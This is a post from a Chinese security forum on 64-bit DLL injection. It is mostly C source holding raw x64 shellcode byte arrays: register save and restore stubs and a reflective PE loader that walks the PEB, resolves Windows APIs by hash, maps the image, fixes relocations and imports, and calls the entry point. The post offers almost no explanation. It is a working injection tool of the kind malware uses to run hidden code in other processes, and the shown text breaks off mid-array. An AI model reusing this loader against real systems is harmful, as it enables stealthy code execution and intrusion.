[原创]64位dll注入-编程技术-看雪安全社区｜专业技术交流与安全研究论坛

[原创]64位dll注入

发表于: 2025-8-31 10:24 1101

[原创]64位dll注入

许瑞

2025-8-31 10:24

1101

小白也不知道这是属于什么注入方法

参考这个916K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1j5Y4y4Q4x3X3g2A6K9X3W2F1k6%4W2A6i4K6u0W2j5$3!0E0i4K6u0r3k6X3!0J5N6h3#2Q4x3X3g2H3K9s2m8Q4x3@1k6E0L8$3c8Q4x3@1c8$3K9h3g2%4N6r3S2J5k6h3q4V1i4K6t1$3j5h3#2H3i4K6y4n7N6r3W2V1i4K6y4p5x3e0x3^5x3e0R3@1x3U0V1`.

#include "pch.h"

#include "work.h"

unsigned char ucpush[] = { 0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x41,0x50,0x41,0x51,0x41,0x52,0x41,0x53,0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,0x9C };

unsigned char ucpop[] = { 0x9D,0x41,0x5F,0x41,0x5E,0x41,0x5D,0x41,0x5C,0x41,0x5B,0x41,0x5A,0x41,0x59,0x41,0x58,0x5F,0x5E,0x5D,0x5C,0x5B,0x5A,0x59,0x58 };

unsigned char load[] = { 0x48,0x89,0x4C,0x24,0x08,0x57,0x48,0x81,0xEC,0x30,0x02,0x00,0x00,0x48,0x8B,0x84,0x24,0x40,0x02,0x00,0x00,0x48,0x89,0x44,0x24,0x38,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0x48,0x8B,0x44,0x24,0x38,0x0F,0xB7,0x00,0x3D,0x4D,0x5A,0x00,0x00,0x74,0x07,0x33,0xC0,0xE9,0x04,0x08,0x00,0x00,0x48,0x8B,0x44,0x24,0x38,0x48,0x63,0x40,0x3C,0x48,0x8B,0x4C,0x24,0x38,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x38,0x48,0x8B,0x44,0x24,0x38,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x07,0x33,0xC0,0xE9,0xD7,0x07,0x00,0x00,0x48,0x8B,0x44,0x24,0x38,0x0F,0xB7,0x40,0x16,0x85,0xC0,0x75,0x0A,0xC7,0x44,0x24,0x70,0x01,0x00,0x00,0x00,0xEB,0x08,0xC7,0x44,0x24,0x70,0x00,0x00,0x00,0x00,0x8B,0x44,0x24,0x70,0x25,0x00,0x20,0x00,0x00,0x85,0xC0,0x74,0x07,0x33,0xC0,0xE9,0xA4,0x07,0x00,0x00,0x48,0x8B,0x44,0x24,0x38,0x0F,0xB7,0x40,0x16,0x85,0xC0,0x75,0x0A,0xC7,0x44,0x24,0x74,0x01,0x00,0x00,0x00,0xEB,0x08,0xC7,0x44,0x24,0x74,0x00,0x00,0x00,0x00,0x8B,0x44,0x24,0x74,0x83,0xE0,0x02,0x85,0xC0,0x74,0x07,0x33,0xC0,0xE9,0x73,0x07,0x00,0x00,0x48,0x8B,0x44,0x24,0x38,0x0F,0xB7,0x40,0x18,0x3D,0x0B,0x02,0x00,0x00,0x74,0x07,0x33,0xC0,0xE9,0x5C,0x07,0x00,0x00,0xB9,0x17,0xCA,0x2B,0x6E,0xE8,0x5B,0x07,0x00,0x00,0x48,0x89,0x84,0x24,0x80,0x00,0x00,0x00,0x48,0x83,0xBC,0x24,0x80,0x00,0x00,0x00,0x00,0x75,0x07,0x33,0xC0,0xE9,0x38,0x07,0x00,0x00,0xBA,0x64,0x87,0xD7,0x0D,0x48,0x8B,0x8C,0x24,0x80,0x00,0x00,0x00,0xE8,0x93,0x08,0x00,0x00,0x48,0x89,0x84,0x24,0xD8,0x00,0x00,0x00,0xBA,0x50,0xDF,0xF1,0x62,0x48,0x8B,0x8C,0x24,0x80,0x00,0x00,0x00,0xE8,0x79,0x08,0x00,0x00,0x48,0x89,0x44,0x24,0x68,0xBA,0x76,0x46,0x8B,0x8A,0x48,0x8B,0x8C,0x24,0x80,0x00,0x00,0x00,0xE8,0x62,0x08,0x00,0x00,0x48,0x89,0x84,0x24,0xF0,0x00,0x00,0x00,0xBA,0x7A,0xEE,0xCA,0x1A,0x48,0x8B,0x8C,0x24,0x80,0x00,0x00,0x00,0xE8,0x48,0x08,0x00,0x00,0x48,0x89,0x84,0x24,0xD0,0x00,0x00,0x00,0x48,0x83,0xBC,0x24,0xD8,0x00,0x00,0x00,0x00,0x75,0x07,0x33,0xC0,0xE9,0xC1,0x06,0x00,0x00,0x48,0x83,0x7C,0x24,0x68,0x00,0x75,0x07,0x33,0xC0,0xE9,0xB2,0x06,0x00,0x00,0x48,0x83,0xBC,0x24,0xF0,0x00,0x00,0x00,0x00,0x75,0x07,0x33,0xC0,0xE9,0xA0,0x06,0x00,0x00,0x48,0x83,0xBC,0x24,0xD0,0x00,0x00,0x00,0x00,0x75,0x07,0x33,0xC0,0xE9,0x8E,0x06,0x00,0x00,0x48,0x8B,0x8C,0x24,0x40,0x02,0x00,0x00,0xE8,0x2B,0x0A,0x00,0x00,0x89,0x84,0x24,0xB0,0x00,0x00,0x00,0x8B,0x84,0x24,0xB0,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x40,0x00,0x00,0x00,0x41,0xB9,0x00,0x30,0x00,0x00,0x44,0x8B,0xC0,0x33,0xD2,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xFF,0x94,0x24,0xD8,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x30,0x48,0x83,0x7C,0x24,0x30,0x00,0x75,0x07,0x33,0xC0,0xE9,0x3E,0x06,0x00,0x00,0x48,0x8B,0x44,0x24,0x38,0x44,0x8B,0x40,0x54,0x48,0x8B,0x94,0x24,0x40,0x02,0x00,0x00,0x48,0x8B,0x4C,0x24,0x30,0xE8,0x80,0x0B,0x00,0x00,0x48,0x8B,0x44,0x24,0x38,0x48,0x05,0x08,0x01,0x00,0x00,0x48,0x89,0x84,0x24,0xA0,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0xEB,0x0A,0x8B,0x44,0x24,0x40,0xFF,0xC0,0x89,0x44,0x24,0x40,0x48,0x8B,0x44,0x24,0x38,0x0F,0xB7,0x40,0x06,0x39,0x44,0x24,0x40,0x0F,0x8D,0x94,0x00,0x00,0x00,0x48,0x63,0x44,0x24,0x40,0x48,0x6B,0xC0,0x28,0x48,0x8B,0x8C,0x24,0xA0,0x00,0x00,0x00,0x83,0x7C,0x01,0x10,0x00,0x75,0x02,0xEB,0xC9,0x48,0x63,0x44,0x24,0x40,0x48,0x6B,0xC0,0x28,0x48,0x63,0x4C,0x24,0x40,0x48,0x6B,0xC9,0x28,0x48,0x8B,0x94,0x24,0xA0,0x00,0x00,0x00,0x8B,0x4C,0x0A,0x14,0x48,0x8B,0x94,0x24,0x40,0x02,0x00,0x00,0x48,0x03,0xD1,0x48,0x8B,0xCA,0x48,0x63,0x54,0x24,0x40,0x48,0x6B,0xD2,0x28,0x4C,0x8B,0x84,0x24,0xA0,0x00,0x00,0x00,0x41,0x8B,0x54,0x10,0x0C,0x4C,0x8B,0x44,0x24,0x30,0x4C,0x03,0xC2,0x49,0x8B,0xD0,0x48,0x89,0x94,0x24,0x10,0x01,0x00,0x00,0x4C,0x8B,0x84,0x24,0xA0,0x00,0x00,0x00,0x45,0x8B,0x44,0x00,0x10,0x48,0x8B,0xD1,0x48,0x8B,0x84,0x24,0x10,0x01,0x00,0x00,0x48,0x8B,0xC8,0xE8,0xB7,0x0A,0x00,0x00,0xE9,0x4F,0xFF,0xFF,0xFF,0x48,0x8B,0x44,0x24,0x38,0x48,0x8B,0x40,0x30,0x48,0x8B,0x4C,0x24,0x30,0x48,0x2B,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x84,0x24,0xE0,0x00,0x00,0x00,0x48,0x83,0xBC,0x24,0xE0,0x00,0x00,0x00,0x00,0x0F,0x84,0xCC,0x01,0x00,0x00,0xB8,0x08,0x00,0x00,0x00,0x48,0x6B,0xC0,0x05,0x48,0x8B,0x4C,0x24,0x38,0x83,0xBC,0x01,0x8C,0x00,0x00,0x00,0x00,0x0F,0x84,0xB0,0x01,0x00,0x00,0xB8,0x08,0x00,0x00,0x00,0x48,0x6B,0xC0,0x05,0x48,0x8B,0x4C,0x24,0x38,0x8B,0x84,0x01,0x88,0x00,0x00,0x00,0x48,0x8B,0x4C,0x24,0x30,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x84,0x24,0x88,0x00,0x00,0x00,0xB8,0x08,0x00,0x00,0x00,0x48,0x6B,0xC0,0x05,0x48,0x8B,0x4C,0x24,0x38,0x8B,0x84,0x01,0x8C,0x00,0x00,0x00,0x89,0x84,0x24,0xB4,0x00,0x00,0x00,0xC7,0x44,0x24,0x5C,0x00,0x00,0x00,0x00,0x8B,0x84,0x24,0xB4,0x00,0x00,0x00,0x39,0x44,0x24,0x5C,0x0F,0x83,0x53,0x01,0x00,0x00,0x48,0x8B,0x84,0x24,0x88,0x00,0x00,0x00,0x8B,0x00,0x89,0x84,0x24,0xBC,0x00,0x00,0x00,0x48,0x8B,0x84,0x24,0x88,0x00,0x00,0x00,0x8B,0x40,0x04,0x89,0x44,0x24,0x60,0x8B,0x44,0x24,0x60,0x48,0x83,0xE8,0x08,0x33,0xD2,0xB9,0x02,0x00,0x00,0x00,0x48,0xF7,0xF1,0x89,0x84,0x24,0xB8,0x00,0x00,0x00,0x48,0x8B,0x84,0x24,0x88,0x00,0x00,0x00,0x48,0x83,0xC0,0x08,0x48,0x89,0x84,0x24,0x18,0x01,0x00,0x00,0xC7,0x44,0x24,0x4C,0x00,0x00,0x00,0x00,0xEB,0x0A,0x8B,0x44,0x24,0x4C,0xFF,0xC0,0x89,0x44,0x24,0x4C,0x8B,0x84,0x24,0xB8,0x00,0x00,0x00,0x39,0x44,0x24,0x4C,0x0F,0x83,0xB2,0x00,0x00,0x00,0x8B,0x44,0x24,0x4C,0x48,0x8B,0x8C,0x24,0x18,0x01,0x00,0x00,0x0F,0xB7,0x04,0x41,0x66,0x89,0x44,0x24,0x44,0x0F,0xB7,0x44,0x24,0x44,0xC1,0xF8,0x0C,0x83,0xE0,0x0F,0x66,0x89,0x44,0x24,0x48,0x0F,0xB7,0x44,0x24,0x44,0x25,0xFF,0x0F,0x00,0x00,0x66,0x89,0x44,0x24,0x58,0x0F,0xB7,0x44,0x24,0x48,0x85,0xC0,0x75,0x04,0xEB,0xA6,0xEB,0x6C,0x0F,0xB7,0x44,0x24,0x48,0x83,0xF8,0x0A,0x75,0x42,0x8B,0x84,0x24,0xBC,0x00,0x00,0x00,0x48,0x8B,0x4C,0x24,0x30,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x0F,0xB7,0x4C,0x24,0x58,0x48,0x03,0xC1,0x48,0x89,0x84,0x24,0xE8,0x00,0x00,0x00,0x48,0x8B,0x84,0x24,0xE8,0x00,0x00,0x00,0x48,0x8B,0x00,0x48,0x03,0x84,0x24,0xE0,0x00,0x00,0x00,0x48,0x8B,0x8C,0x24,0xE8,0x00,0x00,0x00,0x48,0x89,0x01,0xEB,0x20,0x41,0xB9,0x00,0x80,0x00,0x00,0x45,0x33,0xC0,0x48,0x8B,0x54,0x24,0x30,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xFF,0x54,0x24,0x68,0x33,0xC0,0xE9,0x92,0x03,0x00,0x00,0xE9,0x33,0xFF,0xFF,0xFF,0x8B,0x44,0x24,0x60,0x8B,0x4C,0x24,0x5C,0x03,0xC8,0x8B,0xC1,0x89,0x44,0x24,0x5C,0x8B,0x44,0x24,0x60,0x48,0x8B,0x8C,0x24,0x88,0x00,0x00,0x00,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x84,0x24,0x88,0x00,0x00,0x00,0xE9,0x9C,0xFE,0xFF,0xFF,0xB8,0x08,0x00,0x00,0x00,0x48,0x6B,0xC0,0x01,0x48,0x8B,0x4C,0x24,0x38,0x83,0xBC,0x01,0x8C,0x00,0x00,0x00,0x00,0x0F,0x84,0xC4,0x02,0x00,0x00,0xB8,0x08,0x00,0x00,0x00,0x48,0x6B,0xC0,0x01,0x48,0x8B,0x4C,0x24,0x38,0x8B,0x84,0x01,0x88,0x00,0x00,0x00,0x48,0x8B,0x4C,0x24,0x30,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x50,0x48,0x8B,0x44,0x24,0x50,0x83,0x78,0x0C,0x00,0x0F,0x84,0x90,0x02,0x00,0x00,0x48,0x8B,0x44,0x24,0x50,0x8B,0x40,0x0C,0x48,0x8B,0x4C,0x24,0x30,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x8B,0xC8,0xFF,0x94,0x24,0xF0,0x00,0x00,0x00,0x48,0x89,0x84,0x24,0xC8,0x00,0x00,0x00,0x48,0x83,0xBC,0x24,0xC8,0x00,0x00,0x00,0x00,0x75,0x20,0x41,0xB9,0x00,0x80,0x00,0x00,0x45,0x33,0xC0,0x48,0x8B,0x54,0x24,0x30,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xFF,0x54,0x24,0x68,0x33,0xC0,0xE9,0xBE,0x02,0x00,0x00,0x48,0xC7,0x84,0x24,0x98,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x78,0x00,0x00,0x00,0x00,0x48,0x8B,0x44,0x24,0x50,0x83,0x38,0x00,0x74,0x34,0x48,0x8B,0x44,0x24,0x50,0x8B,0x00,0x48,0x8B,0x4C,0x24,0x30,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x84,0x24,0x98,0x00,0x00,0x00,0x48,0x8B,0x44,0x24,0x50,0x8B,0x40,0x10,0x48,0x8B,0x4C,0x24,0x30,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x78,0xEB,0x33,0x48,0x8B,0x44,0x24,0x50,0x8B,0x40,0x10,0x48,0x8B,0x4C,0x24,0x30,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x84,0x24,0x98,0x00,0x00,0x00,0x48,0x8B,0x44,0x24,0x50,0x8B,0x40,0x10,0x48,0x8B,0x4C,0x24,0x30,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x78,0x33,0xC0,0x83,0xF8,0x01,0x0F,0x84,0x9C,0x01,0x00,0x00,0x48,0x8B,0x84,0x24,0x98,0x00,0x00,0x00,0x48,0x8B,0x00,0x48,0x89,0x84,0x24,0xA8,0x00,0x00,0x00,0x48,0x83,0xBC,0x24,0xA8,0x00,0x00,0x00,0x00,0x75,0x05,0xE9,0x79,0x01,0x00,0x00,0x48,0xC7,0x84,0x24,0x90,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xB8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x48,0x8B,0x8C,0x24,0xA8,0x00,0x00,0x00,0x48,0x23,0xC8,0x48,0x8B,0xC1,0x48,0x85,0xC0,0x74,0x65,0x48,0x8B,0x84,0x24,0xA8,0x00,0x00,0x00,0x48,0x25,0xFF,0xFF,0x00,0x00,0x89,0x84,0x24,0xC0,0x00,0x00,0x00,0x8B,0x84,0x24,0xC0,0x00,0x00,0x00,0x8B,0xD0,0x48,0x8B,0x8C,0x24,0xC8,0x00,0x00,0x00,0xFF,0x94,0x24,0xD0,0x00,0x00,0x00,0x48,0x89,0x84,0x24,0x90,0x00,0x00,0x00,0x48,0x83,0xBC,0x24,0x90,0x00,0x00,0x00,0x00,0x75,0x20,0x41,0xB9,0x00,0x80,0x00,0x00,0x45,0x33,0xC0,0x48,0x8B,0x54,0x24,0x30,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xFF,0x54,0x24,0x68,0x33,0xC0,0xE9,0x81,0x01,0x00,0x00,0xE9,0xB4,0x00,0x00,0x00,0x48,0x8B,0x84,0x24,0xA8,0x00,0x00,0x00,0x48,0x8B,0x4C,0x24,0x30,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x84,0x24,0xF8,0x00,0x00,0x00,0x48,0x8B,0x84,0x24,0xF8,0x00,0x00,0x00,0x8B,0x00,0x89,0x84,0x24,0x08,0x01,0x00,0x00,0xC6,0x84,0x24,0x30,0x01,0x00,0x00,0x00,0x48,0x8D,0x84,0x24,0x31,0x01,0x00,0x00,0x48,0x8B,0xF8,0x33,0xC0,0xB9,0xFF,0x00,0x00,0x00,0xF3,0xAA,0x48,0x8B,0x84,0x24,0xF8,0x00,0x00,0x00,0x48,0x83,0xC0,0x02,0x41,0xB8,0xFF,0x00,0x00,0x00,0x48,0x8B,0xD0,0x48,0x8D,0x8C,0x24,0x30,0x01,0x00,0x00,0xE8,0x6F,0x06,0x00,0x00,0x48,0x8D,0x94,0x24,0x30,0x01,0x00,0x00,0x48,0x8B,0x8C,0x24,0xC8,0x00,0x00,0x00,0xFF,0x94,0x24,0xD0,0x00,0x00,0x00,0x48,0x89,0x84,0x24,0x90,0x00,0x00,0x00,0x48,0x83,0xBC,0x24,0x90,0x00,0x00,0x00,0x00,0x75,0x20,0x41,0xB9,0x00,0x80,0x00,0x00,0x45,0x33,0xC0,0x48,0x8B,0x54,0x24,0x30,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xFF,0x54,0x24,0x68,0x33,0xC0,0xE9,0xC8,0x00,0x00,0x00,0x48,0x8B,0x44,0x24,0x78,0x48,0x8B,0x8C,0x24,0x90,0x00,0x00,0x00,0x48,0x89,0x08,0x48,0x8B,0x84,0x24,0x98,0x00,0x00,0x00,0x48,0x83,0xC0,0x08,0x48,0x89,0x84,0x24,0x98,0x00,0x00,0x00,0x48,0x8B,0x44,0x24,0x78,0x48,0x83,0xC0,0x08,0x48,0x89,0x44,0x24,0x78,0xE9,0x59,0xFE,0xFF,0xFF,0x48,0x8B,0x44,0x24,0x50,0x48,0x83,0xC0,0x14,0x48,0x89,0x44,0x24,0x50,0xE9,0x61,0xFD,0xFF,0xFF,0x48,0x8B,0x44,0x24,0x38,0x83,0x78,0x28,0x00,0x74,0x6E,0x48,0x8B,0x44,0x24,0x38,0x8B,0x40,0x28,0x48,0x8B,0x4C,0x24,0x30,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x84,0x24,0x20,0x01,0x00,0x00,0x48,0x8B,0x84,0x24,0x20,0x01,0x00,0x00,0x48,0x89,0x84,0x24,0x00,0x01,0x00,0x00,0x45,0x33,0xC0,0xBA,0x01,0x00,0x00,0x00,0x33,0xC9,0xFF,0x94,0x24,0x00,0x01,0x00,0x00,0x0F,0xB6,0xC0,0x85,0xC0,0x75,0x2B,0x45,0x33,0xC0,0x33,0xD2,0x33,0xC9,0xFF,0x94,0x24,0x00,0x01,0x00,0x00,0x41,0xB9,0x00,0x80,0x00,0x00,0x45,0x33,0xC0,0x48,0x8B,0x54,0x24,0x30,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xFF,0x54,0x24,0x68,0x33,0xC0,0xEB,0x05,0x48,0x8B,0x44,0x24,0x30,0x48,0x81,0xC4,0x30,0x02,0x00,0x00,0x5F,0xC3,0x89,0x4C,0x24,0x08,0x48,0x83,0xEC,0x58,0x65,0x48,0x8B,0x04,0x25,0x60,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x38,0x48,0x83,0x7C,0x24,0x38,0x00,0x74,0x0C,0x48,0x8B,0x44,0x24,0x38,0x48,0x83,0x78,0x18,0x00,0x75,0x07,0x33,0xC0,0xE9,0x92,0x00,0x00,0x00,0x48,0x8B,0x44,0x24,0x38,0x48,0x8B,0x40,0x18,0x48,0x83,0xC0,0x20,0x48,0x89,0x44,0x24,0x40,0x48,0x8B,0x44,0x24,0x40,0x48,0x8B,0x00,0x48,0x89,0x44,0x24,0x28,0x48,0x83,0x7C,0x24,0x28,0x00,0x74,0x69,0x48,0x8B,0x44,0x24,0x40,0x48,0x39,0x44,0x24,0x28,0x74,0x5D,0x48,0x8B,0x44,0x24,0x28,0x48,0x83,0xE8,0x10,0x48,0x89,0x44,0x24,0x30,0x48,0x8B,0x44,0x24,0x30,0x48,0x83,0x78,0x60,0x00,0x74,0x34,0x48,0x8B,0x44,0x24,0x30,0x0F,0xB7,0x40,0x58,0x85,0xC0,0x74,0x27,0x48,0x8B,0x44,0x24,0x30,0x48,0x8B,0x48,0x60,0xE8,0x2F,0x00,0x00,0x00,0x89,0x44,0x24,0x20,0x8B,0x44,0x24,0x60,0x39,0x44,0x24,0x20,0x75,0x0B,0x48,0x8B,0x44,0x24,0x30,0x48,0x8B,0x40,0x30,0xEB,0x11,0x48,0x8B,0x44,0x24,0x28,0x48,0x8B,0x00,0x48,0x89,0x44,0x24,0x28,0xEB,0x8F,0x33,0xC0,0x48,0x83,0xC4,0x58,0xC3,0x48,0x89,0x4C,0x24,0x08,0x48,0x83,0xEC,0x38,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0x48,0x8B,0x44,0x24,0x40,0x48,0x89,0x44,0x24,0x28,0xEB,0x0E,0x48,0x8B,0x44,0x24,0x28,0x48,0x83,0xC0,0x02,0x48,0x89,0x44,0x24,0x28,0x48,0x8B,0x44,0x24,0x28,0x0F,0xB7,0x00,0x85,0xC0,0x74,0x47,0x48,0x8B,0x44,0x24,0x28,0x0F,0xB7,0x00,0x25,0xFF,0x00,0x00,0x00,0x88,0x44,0x24,0x20,0x0F,0xB6,0x44,0x24,0x20,0x83,0xF8,0x61,0x7C,0x16,0x0F,0xB6,0x44,0x24,0x20,0x83,0xF8,0x7A,0x7F,0x0C,0x0F,0xB6,0x44,0x24,0x20,0x83,0xE8,0x20,0x88,0x44,0x24,0x20,0x8B,0x4C,0x24,0x24,0xE8,0x16,0x00,0x00,0x00,0x0F,0xB6,0x4C,0x24,0x20,0x03,0xC1,0x89,0x44,0x24,0x24,0xEB,0x9F,0x8B,0x44,0x24,0x24,0x48,0x83,0xC4,0x38,0xC3,0x89,0x4C,0x24,0x08,0x8B,0x44,0x24,0x08,0xC1,0xE8,0x0D,0x8B,0x4C,0x24,0x08,0xC1,0xE1,0x13,0x0B,0xC1,0xC3,0x89,0x54,0x24,0x10,0x48,0x89,0x4C,0x24,0x08,0x48,0x81,0xEC,0x88,0x00,0x00,0x00,0x48,0x83,0xBC,0x24,0x90,0x00,0x00,0x00,0x00,0x75,0x07,0x33,0xC0,0xE9,0x92,0x01,0x00,0x00,0x48,0x8B,0x84,0x24,0x90,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x38,0x48,0x8B,0x44,0x24,0x38,0x0F,0xB7,0x00,0x3D,0x4D,0x5A,0x00,0x00,0x74,0x07,0x33,0xC0,0xE9,0x6F,0x01,0x00,0x00,0x48,0x8B,0x44,0x24,0x38,0x48,0x63,0x40,0x3C,0x48,0x8B,0x8C,0x24,0x90,0x00,0x00,0x00,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x40,0x48,0x8B,0x44,0x24,0x40,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x07,0x33,0xC0,0xE9,0x3F,0x01,0x00,0x00,0xB8,0x08,0x00,0x00,0x00,0x48,0x6B,0xC0,0x00,0x48,0x8B,0x4C,0x24,0x40,0x48,0x8D,0x84,0x01,0x88,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x48,0x48,0x8B,0x44,0x24,0x48,0x83,0x38,0x00,0x75,0x07,0x33,0xC0,0xE9,0x13,0x01,0x00,0x00,0x48,0x8B,0x44,0x24,0x48,0x8B,0x00,0x48,0x8B,0x8C,0x24,0x90,0x00,0x00,0x00,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x28,0x48,0x8B,0x44,0x24,0x28,0x8B,0x40,0x20,0x48,0x8B,0x8C,0x24,0x90,0x00,0x00,0x00,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x50,0x48,0x8B,0x44,0x24,0x28,0x8B,0x40,0x24,0x48,0x8B,0x8C,0x24,0x90,0x00,0x00,0x00,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x60,0x48,0x8B,0x44,0x24,0x28,0x8B,0x40,0x1C,0x48,0x8B,0x8C,0x24,0x90,0x00,0x00,0x00,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x68,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0xEB,0x0A,0x8B,0x44,0x24,0x20,0xFF,0xC0,0x89,0x44,0x24,0x20,0x48,0x8B,0x44,0x24,0x28,0x8B,0x40,0x18,0x39,0x44,0x24,0x20,0x0F,0x83,0x80,0x00,0x00,0x00,0x8B,0x44,0x24,0x20,0x48,0x8B,0x4C,0x24,0x50,0x8B,0x04,0x81,0x48,0x8B,0x8C,0x24,0x90,0x00,0x00,0x00,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x58,0x48,0x8B,0x4C,0x24,0x58,0xE8,0x61,0x00,0x00,0x00,0x89,0x44,0x24,0x30,0x8B,0x84,0x24,0x98,0x00,0x00,0x00,0x39,0x44,0x24,0x30,0x75,0x41,0x8B,0x44,0x24,0x20,0x48,0x8B,0x4C,0x24,0x60,0x0F,0xB7,0x04,0x41,0x66,0x89,0x44,0x24,0x24,0x0F,0xB7,0x44,0x24,0x24,0x48,0x8B,0x4C,0x24,0x68,0x8B,0x04,0x81,0x89,0x44,0x24,0x34,0x8B,0x44,0x24,0x34,0x48,0x8B,0x8C,0x24,0x90,0x00,0x00,0x00,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x70,0x48,0x8B,0x44,0x24,0x70,0xEB,0x07,0xE9,0x64,0xFF,0xFF,0xFF,0x33,0xC0,0x48,0x81,0xC4,0x88,0x00,0x00,0x00,0xC3,0x48,0x89,0x4C,0x24,0x08,0x48,0x83,0xEC,0x38,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0x48,0x8B,0x44,0x24,0x40,0x48,0x89,0x44,0x24,0x28,0xEB,0x0D,0x48,0x8B,0x44,0x24,0x28,0x48,0xFF,0xC0,0x48,0x89,0x44,0x24,0x28,0x48,0x8B,0x44,0x24,0x28,0x0F,0xB6,0x00,0x85,0xC0,0x74,0x42,0x48,0x8B,0x44,0x24,0x28,0x0F,0xB6,0x00,0x88,0x44,0x24,0x20,0x0F,0xB6,0x44,0x24,0x20,0x83,0xF8,0x61,0x7C,0x16,0x0F,0xB6,0x44,0x24,0x20,0x83,0xF8,0x7A,0x7F,0x0C,0x0F,0xB6,0x44,0x24,0x20,0x83,0xE8,0x20,0x88,0x44,0x24,0x20,0x8B,0x4C,0x24,0x24,0xE8,0xC4,0xFD,0xFF,0xFF,0x0F,0xB6,0x4C,0x24,0x20,0x03,0xC1,0x89,0x44,0x24,0x24,0xEB,0xA5,0x8B,0x44,0x24,0x24,0x48,0x83,0xC4,0x38,0xC3,0x48,0x89,0x4C,0x24,0x08,0x48,0x81,0xEC,0x88,0x00,0x00,0x00,0x48,0x8B,0x84,0x24,0x90,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x60,0x48,0x8B,0x44,0x24,0x60,0x48,0x89,0x44,0x24,0x58,0x48,0x8B,0x44,0x24,0x58,0x0F,0xB7,0x00,0x3D,0x4D,0x5A,0x00,0x00,0x74,0x07,0x33,0xC0,0xE9,0x53,0x01,0x00,0x00,0x48,0x8B,0x44,0x24,0x58,0x48,0x63,0x40,0x3C,0x48,0x8B,0x4C,0x24,0x60,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x68,0x48,0x8B,0x44,0x24,0x68,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x07,0x33,0xC0,0xE9,0x26,0x01,0x00,0x00,0x48,0x8B,0x44,0x24,0x68,0x48,0x83,0xC0,0x04,0x48,0x89,0x44,0x24,0x50,0x48,0x8B,0x44,0x24,0x50,0x48,0x83,0xC0,0x14,0x48,0x89,0x44,0x24,0x40,0x48,0x8B,0x44,0x24,0x40,0x0F,0xB7,0x00,0x3D,0x0B,0x02,0x00,0x00,0x74,0x07,0x33,0xC0,0xE9,0xF4,0x00,0x00,0x00,0x48,0x8B,0x44,0x24,0x40,0x8B,0x40,0x38,0x89,0x44,0x24,0x2C,0x48,0x8B,0x44,0x24,0x40,0x8B,0x40,0x20,0x89,0x44,0x24,0x30,0x48,0x8B,0x44,0x24,0x50,0x0F,0xB7,0x40,0x02,0x66,0x89,0x44,0x24,0x28,0x48,0x8B,0x44,0x24,0x50,0x0F,0xB7,0x40,0x10,0x48,0x8B,0x4C,0x24,0x40,0x48,0x03,0xC8,0x48,0x8B,0xC1,0x48,0x89,0x44,0x24,0x70,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0x33,0xC0,0x66,0x89,0x44,0x24,0x20,0xEB,0x0D,0x0F,0xB7,0x44,0x24,0x20,0x66,0xFF,0xC0,0x66,0x89,0x44,0x24,0x20,0x0F,0xB7,0x44,0x24,0x20,0x0F,0xB7,0x4C,0x24,0x28,0x3B,0xC1,0x7D,0x73,0x0F,0xB7,0x44,0x24,0x20,0x48,0x6B,0xC0,0x28,0x48,0x8B,0x4C,0x24,0x70,0x8B,0x44,0x01,0x08,0x89,0x44,0x24,0x48,0x83,0x7C,0x24,0x30,0x00,0x74,0x0A,0x8B,0x44,0x24,0x30,0x89,0x44,0x24,0x34,0xEB,0x08,0xC7,0x44,0x24,0x34,0x00,0x10,0x00,0x00,0x0F,0xB7,0